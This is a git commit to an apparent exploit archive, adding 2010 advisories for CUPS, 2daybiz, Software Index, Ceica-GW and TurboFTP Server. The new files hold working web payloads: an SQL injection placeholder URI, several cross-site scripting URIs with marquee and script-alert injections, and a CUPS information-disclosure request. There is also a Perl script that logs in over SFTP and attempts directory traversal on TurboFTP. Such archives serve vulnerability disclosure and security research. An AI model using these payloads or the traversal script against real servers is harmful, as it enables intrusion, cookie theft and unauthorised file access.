Updated 07_25_2014

2014-07-25 04:38:51 +00:00 · 2014-07-25 04:38:51 +00:00 · 8041bf2c96
commit 8041bf2c96
parent 857d210af1
6 changed files with 87 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -30756,3 +30756,8 @@ id,file,description,date,author,platform,type,port
 34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0
 34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 'username' Parameter Cross Site Scripting Vulnerability",2010-06-06,"Adam Baldwin",php,webapps,0
 34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0
+34152,platforms/linux/remote/34152.txt,"CUPS <= 1.4.2 Web Interface Information Disclosure Vulnerability",2010-06-15,"Luca Carettoni",linux,remote,0
+34153,platforms/php/webapps/34153.txt,"2daybiz Network Community Script SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-16,Sid3^effects,php,webapps,0
+34154,platforms/php/webapps/34154.txt,"Software Index 'signinform.php' Cross-Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0
+34155,platforms/php/webapps/34155.txt,"Ceica-GW 'login.php' Cross Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0
+34156,platforms/windows/remote/34156.pl,"TurboFTP Server <= 1.20.745 Directory Traversal Vulnerability",2010-06-17,leinakesi,windows,remote,0
--- a/platforms/linux/remote/34152.txt
+++ b/platforms/linux/remote/34152.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40897/info
+
+CUPS is prone to a remote information-disclosure vulnerability. This issue affects the CUPS web interface component.
+
+Remote attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
+
+NOTE: This issue was previously covered in BID 40871 (Apple Mac OS X Prior to 10.6.4 Multiple Security Vulnerabilities), but has been given its own record to better document it. 
+
+http://www.example.com:631/admin?URL=/admin/&OP=% 
--- a/platforms/php/webapps/34153.txt
+++ b/platforms/php/webapps/34153.txt
@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/40913/info
+
+2daybiz Network Community Script is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+The following example URIs are available:
+
+SQL Injection:
+
+http://www.example.com/products/orkutclone/view_photo.php?page=3&alb=[SQLI]
+
+Cross site Scripting:
+
+http://www.example.com/products/orkutclone/scrapbook.php?id=[XSS] 
--- a/platforms/php/webapps/34154.txt
+++ b/platforms/php/webapps/34154.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40914/info
+
+Software Index is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/signinform.php?msg=/"><marquee><font%20color=gren%20size=30>indoushka</font></marquee> 
--- a/platforms/php/webapps/34155.txt
+++ b/platforms/php/webapps/34155.txt
@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/40917/info
+
+Ceica-GW is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+The following example URIs are available:
+
+http://www.example.com/Ceica/login.php/>"><marquee><font%20color=red%20size=15>XroGuE</font></marquee>
+
+http://www.example.com/Ceica/login.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
+
--- a/platforms/windows/remote/34156.pl
+++ b/platforms/windows/remote/34156.pl
@ -0,0 +1,39 @@
+source: http://www.securityfocus.com/bid/40919/info
+
+TurboFTP Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue can allow an attacker to download or upload arbitrary files outside the root directory. This may aid in further attacks.
+
+TurboFTP Server 1.20.745 is vulnerable; prior versions may also be affected. 
+
+#!/usr/bin/perl
+#leinakesi[at]gmail.com
+#turboFTP Server(sftp module) directory traversal vulnerability
+
+use Net::SSH2;
+use Getopt::Std;
+
+
+@FUZZ = ("..\\A\\", "..\\AA");
+getopts('S:P:u:p:', \%opts);
+$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};
+
+if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) ) {
+	print "usage:\n\tperl	test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
+	print "\tperl	test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
+	exit(0);
+}
+
+$ssh2 = Net::SSH2->new();
+$ssh2->connect($server, $port) || die "can not connect the server, please check.\n"; $ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n"; $sftp = $ssh2->sftp();
+
+foreach(@FUZZ)
+{
+	if($m = $sftp->mkdir($_))
+	{
+		print "mkdir success,  $_\n";
+	}
+}
+
+$ssh2->disconnect();
+exit(0);